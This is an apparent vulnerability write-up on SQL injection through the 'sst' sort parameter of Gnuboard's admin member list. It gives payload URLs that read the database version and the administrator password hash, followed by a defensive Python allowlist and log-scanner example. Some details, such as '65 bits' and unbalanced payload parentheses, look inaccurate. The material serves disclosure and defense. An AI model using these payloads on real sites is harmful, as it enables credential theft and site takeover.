Gnuboard is a popular Korean (kr) bbs. This is only an injection in the admin back end. It is an injection after ORDER BY: the query can be executed as order by a,(select statement). In this case, the select statement in parentheses is used only as a subquery. When the statement syntax is correct, the normal page is returned and no data can be obtained. In this case, MySQL error-based injection can be used to obtain data. For example:

http://127.0.0.1/gnuboard/adm/member_list.php?sst=mb_intercept_date,(select+1+from+(select+count(*),concat(select version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)>0)

To obtain the administrator password:

http://127.0.0.1/gnuboard/adm/member_list.php?sst=mb_intercept_date,(select+1+from+(select+count(*),concat(select mb_password from g4_member limit 0,1),floor(rand(0)*2)x+from+information_schema.tables+group+by+x)a)>0)

When the preceding statement is executed, the error message is: 1242: Subquery returns more than 1 row.

Cause:
By default, the read length of this statement is 65 bits, while mb_password is a varchar whose read length is 255. In this case, use the substr() function to limit the read length. That is, substr(mb_password, 1, 55) retrieves the administrator password.
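
From the defender's side, the sst value described above should only ever be a bare column name. The following is an added example, not Gnuboard's own code: it builds the ORDER BY clause from an allowlist and flags logged requests to adm/member_list.php whose sst is anything else. The allowlist entries other than mb_intercept_date, the sod direction parameter, the default column and the log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed allowlist: only mb_intercept_date appears on the page; the other
# names stand in for whatever columns the member list really sorts on.
ALLOWED_SORT = {"mb_intercept_date", "mb_id", "mb_datetime"}
IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*\Z")
REQUEST = re.compile(r'(\S+) .*?"(?:GET|POST) (\S+) HTTP')

def order_by_clause(sst, sod="", default="mb_datetime"):
    """Build ORDER BY from request input; off-allowlist values fall back."""
    column = sst if sst in ALLOWED_SORT else default
    direction = "DESC" if sod.lower() == "desc" else "ASC"
    return f"ORDER BY {column} {direction}"

def suspicious_sort_requests(log_lines):
    """Return (client, sst) for requests whose sst is not a bare identifier."""
    hits = []
    for line in log_lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/adm/member_list.php"):
            continue
        # parse_qs decodes '+' and %xx, so the check sees the value PHP would see.
        for value in parse_qs(parts.query).get("sst", []):
            if not IDENT.match(value):
                hits.append((client, value))
    return hits

# Constructed access-log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /gnuboard/adm/member_list.php?sst=mb_id&sod=desc HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /gnuboard/adm/member_list.php?sst=mb_intercept_date,(select+1) HTTP/1.1" 200 312',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /gnuboard/index.php?sst=(select+1) HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    print(order_by_clause("mb_intercept_date", "desc"))
    for client, value in suspicious_sort_requests(SAMPLE_LOG):
        print("suspicious sst from", client, "->", value)
```
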